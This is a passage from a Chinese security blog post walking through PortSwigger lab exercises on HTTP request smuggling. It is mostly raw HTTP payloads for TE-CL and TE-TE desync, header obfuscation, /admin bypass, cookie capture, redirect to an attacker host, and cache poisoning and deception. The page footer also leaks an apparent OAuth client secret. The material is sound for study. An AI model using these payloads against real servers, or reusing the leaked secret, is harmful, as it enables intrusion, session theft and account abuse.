<h3 id="te-cl"><a class="markdownIt-Anchor" href="#te-cl"></a> TE-CL</h3>
<p>前端服务器使用Transfer-Encoding头，而后端服务器使用Content-Length头。</p>
<p>简单判断payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac361f181f029323806b3eea0007002e.web-security-academy.net</span><br><span class="line">Content-Length: 3</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">1</span><br><span class="line">G</span><br><span class="line">0</span><br></pre></td></tr></table></figure>
<p>时间延迟payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac361f181f029323806b3eea0007002e.web-security-academy.net</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Content-Length: 6</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">X</span><br></pre></td></tr></table></figure>
<p>响应差异payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac361f181f029323806b3eea0007002e.web-security-academy.net</span><br><span class="line">Content-Length: 4</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">34</span><br><span class="line">GET /404 HTTP/1.1</span><br><span class="line">Content-Length: 17</span><br><span class="line"></span><br><span class="line">a=BADHGSGSG</span><br><span class="line">0</span><br></pre></td></tr></table></figure>
<ul>
<li>注意<br>
需要注意的是走私的请求中，Content-Length一定要少于后面请求中的长度，否则后台会Timeout出现错误。</li>
</ul>
<h3 id="te-te"><a class="markdownIt-Anchor" href="#te-te"></a> TE-TE</h3>
<p>前端服务器和后端服务器都支持Transfer-Encoding标头，但是可以通过以某种方式混淆标头来诱导其中一台服务器不对其进行处理。</p>
<p>混淆的方式：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">Transfer-Encoding: xchunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding : chunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Transfer-Encoding: x</span><br><span class="line"></span><br><span class="line">Transfer-Encoding:[tab]chunked</span><br><span class="line"></span><br><span class="line">[space]Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">X: X[\n]Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">Transfer-Encoding</span><br><span class="line">: chunked</span><br></pre></td></tr></table></figure>
<p>简单判断payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: ac261f3a1eb0e24580730eed00d70071.web-security-academy.net</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-length: 4</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line">Transfer-encoding: cow</span><br><span class="line"></span><br><span class="line">5c</span><br><span class="line">GPOST / HTTP/1.1</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 15</span><br><span class="line"></span><br><span class="line">x=1</span><br><span class="line">0</span><br></pre></td></tr></table></figure>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721203309.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721203309.png" alt="img"></a></p>
<h2 id="利用http请求走私漏洞"><a class="markdownIt-Anchor" href="#利用http请求走私漏洞"></a> 利用HTTP请求走私漏洞</h2>
<h3 id="bypass前端服务器安全验证"><a class="markdownIt-Anchor" href="#bypass前端服务器安全验证"></a> Bypass前端服务器安全验证</h3>
<p><strong>场景</strong>：前端服务器对某些页面添加了访问限制，比如实验中对admin页面控制在只能是后端服务器才能访问，此时可以通过HTTP走私漏洞来绕过这个限制。</p>
<ul>
<li>CL-TE</li>
</ul>
<p>实验地址：<a target="_blank" rel="noopener" href="https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te">https://portswigger.net/web-security/request-smuggling/exploiting/lab-bypass-front-end-controls-cl-te</a></p>
<p>发送两次请求，响应消息反馈不允许重复header</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721213930.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721213930.png" alt="img"></a></p>
<p>于是，加个传输字符数限制，将走私后面的请求去掉，即可访问/admin界面了</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721221139.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221139.png" alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721221407.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221407.png" alt="img"></a></p>
<p>完成删除用户</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721221816.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721221816.png" alt="img"></a></p>
<ul>
<li>TE-CL</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721223313.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721223313.png" alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200721223504.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200721223504.png" alt="img"></a></p>
<h3 id="获取前端服务器对请求的重写情况"><a class="markdownIt-Anchor" href="#获取前端服务器对请求的重写情况"></a> 获取前端服务器对请求的重写情况</h3>
<p><strong>场景</strong>：前端服务器通常在请求添加到其他请求头之前，先对请求进行一些重写，然后再转发给后端服务器。一般是添加一些HTTP HEADER。可以通过HTTP走私请求来获取到这些重写内容。</p>
<p>但走私的前提需具备一些条件：</p>
<ul>
<li>存在一个POST请求，传入参数会储存并可以被查看</li>
<li>存在HTTP走私请求</li>
</ul>
<p>构造一个chunk，包含一个完整的post请求，把可以储存的参数放在最后。当第二个请求传递时，则会把HTTP HEADER添加在参数后面而被存储。就可以获取到前端服务器所添加的HTTP HEADER。这里需要注意Content-Length不能超过所传递数据包的长度，不然会导致请求失败</p>
<p>尝试走私请求直接访问/admin，却返回响应信息只有管理员登陆或者从127.0.0.1请求才可以访问</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724145918.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724145918.png" alt="img"></a></p>
<p>页面上有个搜索框，输入任意内容，会在页面上返回出来</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724150746.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724150746.png" alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724150855.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724150855.png" alt="img"></a></p>
<p>于是利用这个搜索参数，将前端服务器重写请求的情况展示出来，发现了 X-trnzSu-Ip 请求头</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724151412.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724151412.png" alt="img"></a></p>
<p>于是加入走私的请求，再尝试访问/admin发现成功</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724151656.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724151656.png" alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724152230.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724152230.png" alt="img"></a></p>
<h3 id="获取其他用户的cookie"><a class="markdownIt-Anchor" href="#获取其他用户的cookie"></a> 获取其他用户的cookie</h3>
<p>参考上一个实验，这个实验也是通过获取HTTP HEADER来获取其他用户的Cookie。</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724164032.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164032.png" alt="img"></a></p>
<h3 id="http-header导致的xss"><a class="markdownIt-Anchor" href="#http-header导致的xss"></a> HTTP header导致的XSS</h3>
<p><strong>场景</strong>：通常情况下，HTTP HEADER导致的XSS是不好利用的，但是通过HTTP走私请求，我们能够控制HTTP HEADER，进而就可以利用这类HTTP头导致的XSS。</p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724164602.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164602.png" alt="img"></a></p>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724164644.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724164644.png" alt="img"></a></p>
<h3 id="将重定向转变为任意重定向"><a class="markdownIt-Anchor" href="#将重定向转变为任意重定向"></a> 将重定向转变为任意重定向</h3>
<p><strong>场景</strong>：许多应用程序执行现场重定向，并将主机名从请求的Host标头放入重定向URL。</p>
<p>示例：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /home HTTP/1.1</span><br><span class="line">Host: normal-website.com</span><br><span class="line"></span><br><span class="line">HTTP/1.1 301 Moved Permanently</span><br><span class="line">Location: https://normal-website.com/home/</span><br></pre></td></tr></table></figure>
<p>通常，此行为被认为是无害的，但是可以在走私请求攻击中利用它来将其他用户重定向到外部域。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line">Content-Length: 54</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">GET /home HTTP/1.1</span><br><span class="line">Host: attacker-website.com</span><br><span class="line">Foo: X</span><br></pre></td></tr></table></figure>
<p>走私的请求将触发重定向到攻击者的网站，这将影响后端服务器处理的下一个用户的请求。例如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">GET /home HTTP/1.1</span><br><span class="line">Host: attacker-website.com</span><br><span class="line">Foo: XGET /scripts/include.js HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line"></span><br><span class="line">HTTP/1.1 301 Moved Permanently</span><br><span class="line">Location: https://attacker-website.com/home/</span><br></pre></td></tr></table></figure>
<h3 id="缓存投毒"><a class="markdownIt-Anchor" href="#缓存投毒"></a> 缓存投毒</h3>
<ul>
<li>构造一个页面中写入恶意的内容，比如写入alert(document.cookie)</li>
<li>发送请求走私的内容</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: your-lab-id.web-security-academy.net</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 129</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">GET /post/next?postId=3 HTTP/1.1</span><br><span class="line">Host: anything</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 10</span><br><span class="line"></span><br><span class="line">x=1</span><br></pre></td></tr></table></figure>
<ul>
<li>再寻找到一个可用缓存的js页面（可用导致xss的js）访问。页面会跳转到恶意页面中，并且将恶意内容缓存到服务器上。</li>
<li>打开主页 ⇒ 导致xss</li>
</ul>
<h3 id="缓存欺骗"><a class="markdownIt-Anchor" href="#缓存欺骗"></a> 缓存欺骗</h3>
<p>缓存欺骗：在Web缓存欺骗中，攻击者使应用程序将一些属于另一个用户的敏感内容存储在缓存中，然后攻击者从缓存中检索此内容。</p>
<ul>
<li>寻找一个存在隐私的页面，比如这里的my-account，并且页面返回的内容是可以被缓存的</li>
<li>发送一个走私请求，下一个请求静态资源的请求会跳转到my-acount并把隐私信息缓存</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">POST / HTTP/1.1</span><br><span class="line">Host: your-lab-id.web-security-academy.net</span><br><span class="line">Content-Type: application/x-www-form-urlencoded</span><br><span class="line">Content-Length: 42</span><br><span class="line">Transfer-Encoding: chunked</span><br><span class="line"></span><br><span class="line">0</span><br><span class="line"></span><br><span class="line">GET /my-account HTTP/1.1</span><br><span class="line">X-Ignore: X</span><br></pre></td></tr></table></figure>
<ul>
<li>打开隐私浏览器加载主页，用Brupsuite搜索隐私内容的关键字。如果成功的话可以在静态资源中搜索到</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://raw.githubusercontent.com/Dsysf/images/master/20200724173247.png"><img src="/2022/11/%E6%B5%85%E8%B0%88Http%E8%AF%B7%E6%B1%82%E8%B5%B0%E7%A7%81/20200724173247.png" alt="img"></a></p>
<p>原理是走私的请求把下一个请求HTTP方法那一行注释，请求会变为：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GET /private/messages HTTP/1.1</span><br><span class="line">Foo: XGET /static/some-image.png HTTP/1.1</span><br><span class="line">Host: vulnerable-website.com</span><br><span class="line">Cookie: sessionId=q1jn30m6mqa7nbwsa0bhmbr7ln2vmh7z</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E6%8A%80%E6%9C%AF%E6%80%BB%E7%BB%93/" rel="tag"># 技术总结</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2022/11/%E5%B8%B8%E8%A7%81%E6%96%87%E4%BB%B6%E5%A4%B4%E6%A0%87%E5%87%86%E7%BC%96%E7%A0%81/" rel="prev" title="文件头标准编码">
                  <i class="fa fa-chevron-left"></i> 文件头标准编码
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2022/12/RCTF2022-Writeup/" rel="next" title="RCTF2022-Writeup">
                  RCTF2022-Writeup <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">


<script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">TWe1v3</span>
</div>
<div class="wordcount">
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-line"></i>
    </span>
      <span>站点总字数：</span>
    <span title="站点总字数">180k</span>
  </span>
  <span class="post-meta-item">
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span>站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">2:43</span>
  </span>
</div>

<div class="powered-by">
<i class="fa fa-user-md"></i><span id="busuanzi_container_site_uv">
  本站访客数:<span id="busuanzi_value_site_uv"></span>
</span>
</div>

    </div>
  </footer>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  


  <script class="next-config" data-name="mermaid" type="application/json">{"enable":true,"theme":{"light":"default","dark":"dark"},"js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/mermaid/9.1.3/mermaid.min.js","integrity":"sha256-TIYL00Rhw/8WaoUhYTLX9SKIEFdXxg+yMWSLVUbhiLg="}}</script>
  <script src="/js/third-party/tags/mermaid.js"></script>



  




  

  <script class="next-config" data-name="enableMath" type="application/json">false</script><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/katex.min.css" integrity="sha256-uik/hNqHWZldXh/0K35nqOSCff9F61/ZOFReqNOBgB0=" crossorigin="anonymous">
  <script class="next-config" data-name="katex" type="application/json">{"copy_tex_js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/KaTeX/0.16.0/contrib/copy-tex.min.js","integrity":"sha256-Us54+rSGDSTvIhKKUs4kygE2ipA0RXpWWh0/zLqw3bs="}}</script>
  <script src="/js/third-party/math/katex.js"></script>


<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.css" integrity="sha256-AJnUHL7dBv6PGaeyPQJcgQPDjt/Hn/PvYZde1iqfp8U=" crossorigin="anonymous">

<script class="next-config" data-name="gitalk" type="application/json">{"enable":true,"github_id":"TWe1v3# GitHub repo owner","repo":"TWe1v3-Blogcomment","client_id":"b1f12cb0fd210a7f001b# GitHub Application Client ID","client_secret":"80355aa1b174d1926079780262cdc80f1ca96516","admin_user":"TWe1v3","distraction_free_mode":true,"proxy":"https://cors-anywhere.azm.workers.dev/https://github.com/login/oauth/access_token","language":"zh-CN","js":{"url":"https://cdnjs.cloudflare.com/ajax/libs/gitalk/1.7.2/gitalk.min.js","integrity":"sha256-Pmj85ojLaPOWwRtlMJwmezB/Qg8BzvJp5eTzvXaYAfA="},"path_md5":"82fb468097e8bdd49a4d569fab1d95bd"}</script>
<script src="/js/third-party/comments/gitalk.js"></script>


<script src="/live2d-widget/autoload.js"></script>
</body>
</html>
